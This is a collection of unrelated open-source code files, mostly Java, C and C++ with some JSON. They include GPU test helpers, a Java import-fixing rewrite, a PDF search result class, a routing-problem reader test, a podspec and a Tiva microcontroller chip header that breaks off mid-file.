      VaryingInfo* varyings,
      size_t num_varyings,
      ProgramOutputInfo* program_outputs,
      size_t num_program_outputs,
      GLuint service_id);

  // Drives BufferManager::DoBufferData with a mocked GL error result.
  static void DoBufferData(::gl::MockGLInterface* gl,
                           MockErrorState* error_state,
                           BufferManager* manager,
                           Buffer* buffer,
                           GLenum target,
                           GLsizeiptr size,
                           GLenum usage,
                           const GLvoid* data,
                           GLenum error);

  // Sets a texture parameter while expecting the given GL error.
  static void SetTexParameteriWithExpectations(::gl::MockGLInterface* gl,
                                               MockErrorState* error_state,
                                               TextureManager* manager,
                                               TextureRef* texture_ref,
                                               GLenum pname,
                                               GLint value,
                                               GLenum error);

  // Forces a Shader object into a given compiled state, optionally supplying
  // the translator outputs (log, translated source, variable maps, ...).
  static void SetShaderStates(
      ::gl::MockGLInterface* gl,
      Shader* shader,
      bool expected_valid,
      const std::string* const expected_log_info,
      const std::string* const expected_translated_source,
      const int* const expected_shader_version,
      const AttributeMap* const expected_attrib_map,
      const UniformMap* const expected_uniform_map,
      const VaryingMap* const expected_varying_map,
      const InterfaceBlockMap* const expected_interface_block_map,
      const OutputVariableList* const expected_output_variable_list,
      const NameMap* const expected_name_map);
  static void SetShaderStates(::gl::MockGLInterface* gl,
                              Shader* shader,
                              bool valid);

  // Convenience builders for ANGLE shader-translator variable descriptors.
  static sh::Attribute ConstructAttribute(
      GLenum type, GLint array_size, GLenum precision,
      bool static_use, const std::string& name);
  static sh::Uniform ConstructUniform(
      GLenum type, GLint array_size, GLenum precision,
      bool static_use, const std::string& name);
  static sh::Varying ConstructVarying(
      GLenum type, GLint array_size, GLenum precision,
      bool static_use, const std::string& name);
  static sh::OutputVariable ConstructOutputVariable(GLenum type,
                                                    GLint array_size,
                                                    GLenum precision,
                                                    bool static_use,
                                                    const std::string& name);

 private:
  // Per-target helpers shared by the texture manager expectations above.
  static void SetupTextureInitializationExpectations(::gl::MockGLInterface* gl,
                                                     GLenum target,
                                                     bool use_default_textures);
  static void SetupTextureDestructionExpectations(::gl::MockGLInterface* gl,
                                                  GLenum target,
                                                  bool use_default_textures);

  static std::vector<std::string> split_extensions_;
};
} // namespace gles2
} // namespace gpu
#endif // GPU_COMMAND_BUFFER_SERVICE_TEST_HELPER_H_
| 4,177 |
3,182 | <reponame>1337c0der/lombok-intellij-plugin
import lombok.extern.java.Log;
@Log
public class LogTest {

    /** Writes a greeting through the lombok-generated {@code log} field. */
    public void logSomething() {
        log.info("Hello World!");
    }

    public static void main(String[] args) {
        LogTest test = new LogTest();
        test.logSomething();
    }
}
| 110 |
2,443 | // Copyright (c) 2015-2019 The HomeKit ADK Contributors
//
// Licensed under the Apache License, Version 2.0 (the “License”);
// you may not use this file except in compliance with the License.
// See [CONTRIBUTORS.md] for the list of HomeKit ADK project authors.
#ifndef HAP_PLATFORM_RUN_LOOP_H
#define HAP_PLATFORM_RUN_LOOP_H
#ifdef __cplusplus
extern "C" {
#endif
#include "HAPPlatform.h"
#if __has_feature(nullability)
#pragma clang assume_nonnull begin
#endif
/**
* Runs the loop which processes data from all attached input sources.
*
* - This function may only be called while the run loop is stopped.
*/
void HAPPlatformRunLoopRun(void);
/**
* Schedules a request to exit the run loop.
*
* - This function must be called from the same execution context (e.g., thread) as the run loop,
* i.e. it should be scheduled on the run loop.
*
* - When this function returns, the run loop is not yet fully stopped.
* Wait for HAPPlatformRunLoopRun to return.
*
* - The execution of pending scheduled events may be delayed until the run loop is started again.
*/
void HAPPlatformRunLoopStop(void);
/**
* Callback that is invoked from the run loop.
*
* @param context Client context.
* @param contextSize Size of the context.
*/
typedef void (*HAPPlatformRunLoopCallback)(void* _Nullable context, size_t contextSize);
/**
* Schedule a callback that will be called from the run loop.
*
* - It is safe to call this function from execution contexts (e.g., threads) other than the run loop,
* e.g., from another thread or from a signal handler.
*
* @param callback Function to call on the run loop.
* @param context Context that is passed to the callback.
* @param contextSize Size of context data that is passed to the callback.
*
* @return kHAPError_None If successful.
* @return kHAPError_OutOfResources If there are not enough resources to schedule the callback.
*/
HAP_RESULT_USE_CHECK
HAPError HAPPlatformRunLoopScheduleCallback(
HAPPlatformRunLoopCallback callback,
void* _Nullable context,
size_t contextSize);
#if __has_feature(nullability)
#pragma clang assume_nonnull end
#endif
#ifdef __cplusplus
}
#endif
#endif
| 761 |
311 | package org.javacs.rewrite;
import com.sun.source.util.Trees;
import java.io.IOException;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.logging.Logger;
import org.javacs.CompileTask;
import org.javacs.CompilerProvider;
import org.javacs.lsp.Position;
import org.javacs.lsp.Range;
import org.javacs.lsp.TextEdit;
/**
 * Rewrite that regenerates the import section of a single source file: keeps
 * the existing imports that are actually referenced, resolves unresolved
 * simple names against imports known elsewhere in the project, deletes all
 * existing non-static imports and re-inserts the combined, sorted list.
 */
public class AutoFixImports implements Rewrite {
    // File whose import section is rewritten.
    final Path file;

    public AutoFixImports(Path file) {
        this.file = file;
    }

    /**
     * Compiles {@link #file}, computes the new import list and returns the
     * text edits (one deletion per old import plus a single insert with the
     * new block) keyed by the file.
     */
    @Override
    public Map<Path, TextEdit[]> rewrite(CompilerProvider compiler) {
        LOG.info("Fix imports in " + file + "...");
        try (var task = compiler.compile(file)) {
            var used = usedImports(task);
            var unresolved = unresolvedNames(task);
            var resolved = resolveNames(compiler, unresolved);
            var all = new ArrayList<String>();
            all.addAll(used);
            all.addAll(resolved.values());
            all.sort(String::compareTo); // TODO this is not always a good order
            var edits = new ArrayList<TextEdit>();
            edits.addAll(deleteImports(task));
            edits.add(insertImports(task, all));
            return Map.of(file, edits.toArray(new TextEdit[edits.size()]));
        }
    }

    /** Qualified names of the existing imports that are actually referenced. */
    private Set<String> usedImports(CompileTask task) {
        var used = new HashSet<String>();
        new FindUsedImports(task.task).scan(task.root(), used);
        return used;
    }

    /**
     * Simple class names the compiler reported as unresolved in this file.
     * Only plain capitalized identifiers (regex {@code [A-Z]\w+}) are kept.
     */
    private Set<String> unresolvedNames(CompileTask task) {
        var names = new HashSet<String>();
        for (var d : task.diagnostics) {
            if (!d.getCode().equals("compiler.err.cant.resolve.location")) continue;
            if (!d.getSource().toUri().equals(file.toUri())) continue;
            var start = (int) d.getStartPosition();
            var end = (int) d.getEndPosition();
            CharSequence contents;
            try {
                contents = d.getSource().getCharContent(true);
            } catch (IOException e) {
                throw new RuntimeException(e);
            }
            var name = contents.subSequence(start, end).toString();
            if (!name.matches("[A-Z]\\w+")) continue;
            names.add(name);
        }
        return names;
    }

    /**
     * Maps each unresolved simple name to a qualified name taken from the
     * project-wide import list. Names without a candidate are skipped; names
     * with several candidates are ambiguous and skipped with a warning.
     */
    private Map<String, String> resolveNames(CompilerProvider compiler, Set<String> unresolved) {
        var resolved = new HashMap<String, String>();
        var alreadyImported = compiler.imports();
        for (var className : unresolved) {
            var candidates = new ArrayList<String>();
            for (var i : alreadyImported) {
                if (i.endsWith("." + className)) {
                    candidates.add(i);
                }
            }
            if (candidates.isEmpty()) continue;
            if (candidates.size() > 1) {
                LOG.warning("..." + className + " is ambiguous between " + String.join(", ", candidates));
                continue;
            }
            LOG.info("...resolve " + className + " to " + candidates.get(0));
            resolved.put(className, candidates.get(0));
        }
        // TODO import my own classes
        return resolved;
    }

    /** One whole-line deletion edit per existing non-static import. */
    private List<TextEdit> deleteImports(CompileTask task) {
        var edits = new ArrayList<TextEdit>();
        var pos = Trees.instance(task.task).getSourcePositions();
        var root = task.root();
        for (var i : root.getImports()) {
            // Static imports are left untouched.
            if (i.isStatic()) continue;
            var start = pos.getStartPosition(root, i);
            var line = (int) root.getLineMap().getLineNumber(start);
            var delete = new TextEdit(new Range(new Position(line - 1, 0), new Position(line, 0)), "");
            edits.add(delete);
        }
        return edits;
    }

    /** Single insert edit containing one "import X;" line per qualified name. */
    private TextEdit insertImports(CompileTask task, List<String> qualifiedNames) {
        var pos = insertPosition(task);
        var text = new StringBuilder();
        for (var i : qualifiedNames) {
            text.append("import ").append(i).append(";\n");
        }
        return new TextEdit(new Range(pos, pos), text.toString());
    }

    /**
     * Position where the rebuilt import block should be inserted: the line of
     * the first existing non-static import, else the line after the package
     * declaration, else the very top of the file.
     */
    private Position insertPosition(CompileTask task) {
        var pos = Trees.instance(task.task).getSourcePositions();
        var root = task.root();
        // If there are imports, use the start of the first import as the insert position
        for (var i : root.getImports()) {
            if (!i.isStatic()) {
                var start = pos.getStartPosition(root, i);
                var line = (int) root.getLineMap().getLineNumber(start);
                return new Position(line - 1, 0);
            }
        }
        // If there are no imports, insert after the package declaration
        if (root.getPackage() != null) {
            var end = pos.getEndPosition(root, root.getPackage());
            var line = (int) root.getLineMap().getLineNumber(end) + 1;
            return new Position(line - 1, 0);
        }
        // If there are no imports and no package, insert at the top of the file
        return new Position(0, 0);
    }

    private static final Logger LOG = Logger.getLogger("main");
}
| 2,294 |
853 | <filename>crypto/uint32_pack.c
#include "uint32_pack.h"
/*
 * uint32_pack: serialize the 32-bit unsigned integer x into y[0..3]
 * using little-endian byte order (least significant byte first).
 */
void uint32_pack(unsigned char *y, crypto_uint32 x) {
  y[0] = (unsigned char) (x & 0xff);
  y[1] = (unsigned char) ((x >> 8) & 0xff);
  y[2] = (unsigned char) ((x >> 16) & 0xff);
  y[3] = (unsigned char) ((x >> 24) & 0xff);
}
| 115 |
5,169 | {
"name": "JsWebRtc",
"version": "0.0.1",
"summary": "WebRTC.framework",
"description": "WebRTC.framework just for jsrtc-ios-sdk",
"homepage": "https://gitee.com/GikkiAres/js-web-rtc",
"license": "MIT",
"authors": {
"<NAME>": "<EMAIL>"
},
"platforms": {
"ios": "9.0"
},
"source": {
"git": "https://gitee.com/GikkiAres/js-web-rtc.git",
"tag": "0.0.1"
},
"vendored_frameworks": "WebRTC.framework",
"frameworks": [
"UIKit",
"Foundation"
],
"xcconfig": {
"VALID_ARCHS": "arm64",
"skip_validation": true
},
"user_target_xcconfig": {
"EXCLUDED_ARCHS[sdk=iphonesimulator*]": "arm64"
}
}
| 317 |
1,130 | /*
Copyright (c) 2014, <NAME>
2-clause BSD license.
*/
#include <string.h>
/*
 * strcoll - compare two strings according to the current locale's
 * collation order.
 *
 * This minimal libc supports only the "C" locale, where collation order
 * equals plain byte order, so the comparison delegates to strcmp().
 *
 * The parameters are const-qualified to match the ISO C prototype
 * declared in <string.h>; the previous non-const signature conflicted
 * with that declaration.
 */
int strcoll(const char* s1, const char* s2)
{
	return strcmp(s1, s2);
}
| 65 |
809 | <gh_stars>100-1000
/**
* @file traps_core.h
* @brief
* @author <NAME> <<EMAIL>>
* @version 0.1
* @date 2015-08-17
*/
#ifndef ASM_HAL_ENV_TRAPS_CORE_H_
#define ASM_HAL_ENV_TRAPS_CORE_H_
#include <stdint.h>
/** Handler signature invoked by the trap dispatcher on the AArch64 architecture:
 *  receives the trap number and an opaque data pointer, returns a status code. */
typedef int (*__trap_handler)(uint32_t nr, void *data);

/** Trap environment descriptor for AArch64 (currently an empty placeholder). */
typedef struct __traps_env {
} __traps_env_t;
#endif /* ASM_HAL_ENV_TRAPS_CORE_H_ */
| 205 |
6,224 | <filename>tests/subsys/logging/log_benchmark/src/test_helpers.h<gh_stars>1000+
/*
* Copyright (c) 2021 Nordic Semiconductor ASA
*
* SPDX-License-Identifier: Apache-2.0
*/
#ifndef SRC_TEST_HELPERS_H__
#define SRC_TEST_HELPERS_H__
#include <zephyr.h>
/* Prepares the logging subsystem for the benchmark; exposed as a syscall so
 * it can be invoked from user mode. */
__syscall void test_helpers_log_setup(void);

/* Returns a cycle counter reading — presumably used for timing the
 * benchmarked operations; confirm against the implementation. */
__syscall int test_helpers_cycle_get(void);

/* True while dropped log messages are still pending. */
__syscall bool test_helpers_log_dropped_pending(void);
#include <syscalls/test_helpers.h>
#endif /* SRC_TEST_HELPERS_H__ */
| 198 |
2,813 | package org.jabref.model.pdf.search;
import java.io.IOException;
import java.util.Arrays;
import java.util.List;
import java.util.stream.Collectors;
import org.jabref.model.entry.BibEntry;
import org.apache.lucene.analysis.TokenStream;
import org.apache.lucene.index.IndexableField;
import org.apache.lucene.search.IndexSearcher;
import org.apache.lucene.search.Query;
import org.apache.lucene.search.ScoreDoc;
import org.apache.lucene.search.highlight.Highlighter;
import org.apache.lucene.search.highlight.InvalidTokenOffsetsException;
import org.apache.lucene.search.highlight.QueryScorer;
import org.apache.lucene.search.highlight.SimpleHTMLFormatter;
import org.apache.lucene.search.highlight.TextFragment;
import static org.jabref.model.pdf.search.SearchFieldConstants.ANNOTATIONS;
import static org.jabref.model.pdf.search.SearchFieldConstants.CONTENT;
import static org.jabref.model.pdf.search.SearchFieldConstants.MODIFIED;
import static org.jabref.model.pdf.search.SearchFieldConstants.PAGE_NUMBER;
import static org.jabref.model.pdf.search.SearchFieldConstants.PATH;
/**
 * One full-text search hit inside a linked PDF file: the file path, page
 * number, modification time, Lucene relevance score and HTML-highlighted
 * snippets for the page content and annotations.
 */
public final class SearchResult {

    private final String path;
    private final int pageNumber;
    private final long modified;
    private final float luceneScore;

    private final List<String> contentResultStringsHtml;
    private final List<String> annotationsResultStringsHtml;

    /**
     * Builds a result from a Lucene hit: reads the stored fields of the
     * matched document and produces highlighted snippets (matches wrapped in
     * {@code <b>} tags) for the content and annotation fields.
     *
     * @throws IOException if reading the document or tokenizing a field fails
     */
    public SearchResult(IndexSearcher searcher, Query query, ScoreDoc scoreDoc) throws IOException {
        this.path = getFieldContents(searcher, scoreDoc, PATH);
        this.pageNumber = Integer.parseInt(getFieldContents(searcher, scoreDoc, PAGE_NUMBER));
        this.modified = Long.parseLong(getFieldContents(searcher, scoreDoc, MODIFIED));
        this.luceneScore = scoreDoc.score;

        String content = getFieldContents(searcher, scoreDoc, CONTENT);
        String annotations = getFieldContents(searcher, scoreDoc, ANNOTATIONS);

        Highlighter highlighter = new Highlighter(new SimpleHTMLFormatter("<b>", "</b>"), new QueryScorer(query));
        this.contentResultStringsHtml = highlightedFragments(highlighter, CONTENT, content);
        this.annotationsResultStringsHtml = highlightedFragments(highlighter, ANNOTATIONS, annotations);
    }

    /**
     * Runs the highlighter over one field's text and returns up to 10 HTML
     * fragments. Falls back to an empty list when the highlighter reports
     * token offsets that do not match the text.
     */
    private static List<String> highlightedFragments(Highlighter highlighter, String field, String text) throws IOException {
        try (TokenStream stream = new EnglishStemAnalyzer().tokenStream(field, text)) {
            TextFragment[] fragments = highlighter.getBestTextFragments(stream, text, true, 10);
            return Arrays.stream(fragments).map(TextFragment::toString).collect(Collectors.toList());
        } catch (InvalidTokenOffsetsException e) {
            return List.of();
        }
    }

    /** Stored value of the given field, or "" when the field is absent. */
    private String getFieldContents(IndexSearcher searcher, ScoreDoc scoreDoc, String field) throws IOException {
        IndexableField indexableField = searcher.doc(scoreDoc.doc).getField(field);
        if (indexableField == null) {
            return "";
        }
        return indexableField.stringValue();
    }

    /** True when this hit belongs to one of the entry's linked files. */
    public boolean isResultFor(BibEntry entry) {
        return entry.getFiles().stream().anyMatch(linkedFile -> path.equals(linkedFile.getLink()));
    }

    public String getPath() {
        return path;
    }

    public long getModified() {
        return modified;
    }

    public float getLuceneScore() {
        return luceneScore;
    }

    public List<String> getContentResultStringsHtml() {
        return contentResultStringsHtml;
    }

    public List<String> getAnnotationsResultStringsHtml() {
        return annotationsResultStringsHtml;
    }

    public int getPageNumber() {
        return pageNumber;
    }
}
| 1,376 |
591 | /*
* ========================= AI_Crab.h ==========================
* -- tpr --
* CREATE -- 2019.05.09
* MODIFY --
* ----------------------------------------------------------
* 螃蟹式 AI
* -----------------------
*/
#ifndef TPR_AI_CRAB_H
#define TPR_AI_CRAB_H
#include "pch.h"
//-------------------- Engine --------------------//
#include "GameObj.h"
#include "functorTypes.h"
// Crab-style AI component (see file header); currently a mostly-stubbed
// placeholder.
class AI_Crab{
public:
    AI_Crab() = default;

    // Initialization hook. Currently a no-op; the goid binding is disabled.
    inline void init( )noexcept{
        //this->goid = goid_;
    }

    //void logicUpdate();

    // Installs the functor used to fetch a temporary value from the owner.
    // NOTE(review): the parameter type is F_R_int but the stored member is
    // F_1 — confirm these functor typedefs are assignment-compatible.
    inline void bind_get_tmpVal_functor( const F_R_int &functor_ )noexcept{
        this->get_tmpVal_functor = functor_;
    }

private:
    //GameObj *goPtr {nullptr};
    //std::weak_ptr<GameObj> goWPtr {};
    //goid_t goid {};

    //-- temporary state --//
    F_1 get_tmpVal_functor {nullptr};
    //int tmpCount {0};  // unused
};
#endif
| 481 |
1,538 | // Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
#pragma once
#include <functional>
#include <vector>
#include "kudu/gutil/ref_counted.h"
#include "kudu/util/memory/arena.h"
namespace kudu {
class RowBlockRefCounted;
// Handles the memory allocated alongside a RowBlock for variable-length
// cells.
//
// When scanning rows into a RowBlock, the rows may contain variable-length
// data (eg BINARY columns). In this case, the data cannot be inlined directly
// into the columnar data arrays that are part of the RowBlock and instead need
// to be allocated out of a separate Arena. This class wraps that Arena.
//
// In some cases (eg "plain" or "dictionary" encodings), the underlying blocks may contain
// string data in a non-encoded form. In that case, instead of copying strings, we can
// refer to the strings within those data blocks themselves, and hold a reference to
// the underlying block. This class holds those reference counts as well.
struct RowBlockMemory {
  Arena arena;

  explicit RowBlockMemory(int arena_size = 32 * 1024) : arena(arena_size) {}

  ~RowBlockMemory() { Reset(); }

  // Frees all variable-length cell data and drops every retained block
  // reference accumulated since the last Reset().
  void Reset() {
    arena.Reset();
    for (auto& release_func : to_release_) {
      release_func();
    }
    to_release_.clear();
  }

  // Retains a reference, typically to a BlockHandle, releasing it on the
  // next Reset(). Templatized to avoid a circular dependency between
  // kudu/common/ and kudu/cfile/.
  template <class T>
  void RetainReference(const scoped_refptr<T>& item) {
    // TODO(todd) if this ever ends up being a hot code path, we could
    // probably optimize by having a small hashset of pointers. If an
    // element is already in the set, we don't need to add a second copy.
    T* raw = item.get();
    raw->AddRef();
    to_release_.emplace_back([raw]() { raw->Release(); });
  }

 private:
  // Deferred Release() calls, run (and cleared) by Reset().
  std::vector<std::function<void()>> to_release_;
};
} // namespace kudu
| 755 |
1,025 | #import <Foundation/Foundation.h>
// Value object describing one menu entry: a display title, a target/action
// pair, an arbitrary represented object and an optional badge. All
// properties are read-only and set once through the initializer below.
@interface CDEMenuItem : NSObject

#pragma mark Creating
// Initializer taking values for every read-only property.
- (id)initWithTitle:(NSString *)initTitle target:(id)initTarget action:(SEL)initAction representedObject:(id)initRepresentedObject badgeValue:(NSString *)initBadgeValue showsBadge:(BOOL)initShowsBadge;

#pragma mark Properties
@property (nonatomic, readonly, copy) NSString *title;          // display text
@property (nonatomic, readonly, assign) SEL action;             // selector sent to target
@property (nonatomic, readonly, assign) id target;              // action receiver (not retained)
@property (nonatomic, readonly, retain) id representedObject;   // arbitrary payload
@property (nonatomic, readonly, copy) NSString *badgeValue;     // badge text, may be nil
@property (nonatomic, readonly, assign) BOOL showsBadge;        // whether the badge is displayed
@end
713 | {
"location": "/path/accessible/to/the/server/backup-to-restore.zip",
"resources": {
"counters": ["*"]
}
}
| 50 |
634 | /*
* Copyright 2013-2016 consulo.io
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.diff.comparison;
/**
 * Helper for automatically resolving three-way merge conflicts.
 *
 * @author VISTALL
 * @since 18-Aug-16
 */
class MergeResolveUtil {
  /**
   * Tries to produce a conflict-free merge of the left and right texts
   * against the common base.
   *
   * NOTE: not yet implemented — always returns {@code null}, which callers
   * must treat as "conflict could not be resolved automatically". The Kotlin
   * original still needs to be ported (see inline comment).
   */
  public static CharSequence tryResolveConflict(CharSequence leftText, CharSequence baseText, CharSequence rightText) {
    // nothing, we don't have kotlin, and don't want it
    // TODO [VISTALL] convert it from kotlin
    return null;
  }
}
| 277 |
571 | /***************************************************************************
Copyright 2015 Ufora Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
****************************************************************************/
#pragma once
#include "../../core/math/Hash.hpp"
namespace {

// Deterministically generates a test value of type R from an argument pack
// by hashing the (int-converted) arguments together. The primary template is
// only declared; the two partial specializations below provide the
// single-argument base case and the recursive multi-argument case.
template<class R, class ... Args>
class TestCaseCall;

// Base case: one argument. R is constructed from element 0 of
// hash(int(a)) + hash(11).
template<class R, class A1>
class TestCaseCall<R, A1> {
public:
    static R call(A1 a)
    {
        R tr((hash_type((int)a) + hash_type(11))[0]);
        return tr;
    }
};

// Recursive case: hash the first argument and combine it with the value
// produced for the remaining arguments.
template<class R, class A1, typename ... Args>
class TestCaseCall<R, A1, Args... > {
public:
    static R call(A1 a, Args ... args)
    {
        return R((hash_type((int)a) + hash_type((int)TestCaseCall<R, Args ...>::call(args ...)))[0]);
    }
};

}
| 391 |
1,264 | <filename>jsprit-instances/src/test/java/com/graphhopper/jsprit/instance/reader/ChristophidesReaderTest.java
/*
* Licensed to GraphHopper GmbH under one or more contributor
* license agreements. See the NOTICE file distributed with this work for
* additional information regarding copyright ownership.
*
* GraphHopper GmbH licenses this file to you under the Apache License,
* Version 2.0 (the "License"); you may not use this file except in
* compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.graphhopper.jsprit.instance.reader;
import com.graphhopper.jsprit.core.problem.VehicleRoutingProblem;
import com.graphhopper.jsprit.core.problem.VehicleRoutingProblem.FleetSize;
import com.graphhopper.jsprit.core.problem.job.Service;
import com.graphhopper.jsprit.core.problem.vehicle.Vehicle;
import org.junit.Test;
import java.net.URL;
import static org.junit.Assert.assertEquals;
public class ChristophidesReaderTest {
@Test
public void whenReadingInstance_nuOfCustomersIsCorrect() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc1.txt"));
VehicleRoutingProblem vrp = builder.build();
assertEquals(50, vrp.getJobs().values().size());
}
private String getPath(String string) {
URL resource = this.getClass().getClassLoader().getResource(string);
if (resource == null) throw new IllegalStateException("resource " + string + " does not exist");
return resource.getPath();
}
@Test
public void whenReadingInstance_fleetSizeIsInfinite() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc1.txt"));
VehicleRoutingProblem vrp = builder.build();
assertEquals(FleetSize.INFINITE, vrp.getFleetSize());
}
@Test
public void whenReadingInstance_vehicleCapacitiesAreCorrect() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc1.txt"));
VehicleRoutingProblem vrp = builder.build();
for (Vehicle v : vrp.getVehicles()) {
assertEquals(160, v.getType().getCapacityDimensions().get(0));
}
}
@Test
public void whenReadingInstance_vehicleLocationsAreCorrect_and_correspondToDepotLocation() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc1.txt"));
VehicleRoutingProblem vrp = builder.build();
for (Vehicle v : vrp.getVehicles()) {
assertEquals(30.0, v.getStartLocation().getCoordinate().getX(), 0.01);
assertEquals(40.0, v.getStartLocation().getCoordinate().getY(), 0.01);
}
}
@Test
public void whenReadingInstance_vehicleDurationsAreCorrect() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc13.txt"));
VehicleRoutingProblem vrp = builder.build();
for (Vehicle v : vrp.getVehicles()) {
assertEquals(0.0, v.getEarliestDeparture(), 0.01);
assertEquals(720.0, v.getLatestArrival() - v.getEarliestDeparture(), 0.01);
}
}
@Test
public void whenReadingInstance_demandOfCustomerOneIsCorrect() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc1.txt"));
VehicleRoutingProblem vrp = builder.build();
assertEquals(7, vrp.getJobs().get("1").getSize().get(0));
}
@Test
public void whenReadingInstance_serviceDurationOfCustomerTwoIsCorrect() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc13.txt"));
VehicleRoutingProblem vrp = builder.build();
assertEquals(50.0, ((Service) vrp.getJobs().get("2")).getServiceDuration(), 0.1);
}
}
| 1,617 |
578 | <reponame>alekseyl1992/pyrobuf<filename>pyrobuf/__main__.py<gh_stars>100-1000
from pyrobuf.compile import Compiler
def main():
    """Entry point: build a Compiler from the CLI arguments and run it."""
    Compiler.parse_cli_args().compile()


if __name__ == "__main__":
    main()
| 93 |
348 | {"nom":"Appeville","circ":"3ème circonscription","dpt":"Manche","inscrits":157,"abs":83,"votants":74,"blancs":8,"nuls":1,"exp":65,"res":[{"nuance":"REM","nom":"<NAME>","voix":33},{"nuance":"LR","nom":"<NAME>","voix":32}]} | 88 |
1,006 | /****************************************************************************
* arch/arm/include/tiva/chip.h
*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership. The
* ASF licenses this file to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance with the
* License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
****************************************************************************/
#ifndef __ARCH_ARM_INCLUDE_TIVA_CHIP_H
#define __ARCH_ARM_INCLUDE_TIVA_CHIP_H
/****************************************************************************
* Included Files
****************************************************************************/
#include <nuttx/config.h>
/****************************************************************************
* Pre-processor Prototypes
****************************************************************************/
/* Get customizations for each supported chip */
#if defined(CONFIG_ARCH_CHIP_LM3S6918)
# define LM3S 1 /* LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 4 /* Four 16/32-bit timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
# define TIVA_NETHCONTROLLERS 1 /* One Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# undef TIVA_ETHTS /* No timestamp register */
# define TIVA_NSSI 2 /* Two SSI modules */
# define TIVA_NUARTS 2 /* Two UART modules */
# define TIVA_NI2C 2 /* Two I2C modules */
# define TIVA_NADC 1 /* One ADC module */
# define TIVA_NPWM 0 /* No PWM generator modules */
# define TIVA_NQEI 0 /* No quadrature encoders */
# define TIVA_NPORTS 8 /* 8 Ports (GPIOA-H) 5-38 GPIOs */
# define TIVA_NCANCONTROLLER 0 /* No CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_LM3S6432)
# define LM3S 1 /* LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 3 /* Three 16/32-bit timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
# define TIVA_NETHCONTROLLERS 1 /* One Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# undef TIVA_ETHTS /* No timestamp register */
# define TIVA_NSSI 1 /* One SSI module */
# define TIVA_NUARTS 2 /* Two UART modules */
# define TIVA_NI2C 1 /* Two I2C modules */
# define TIVA_NADC 1 /* One ADC module */
# define TIVA_NPWM 1 /* One PWM generator module */
# define TIVA_NQEI 0 /* No quadrature encoders */
# define TIVA_NPORTS 7 /* 7 Ports (GPIOA-G), 0-42 GPIOs */
# define TIVA_NCANCONTROLLER 0 /* No CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
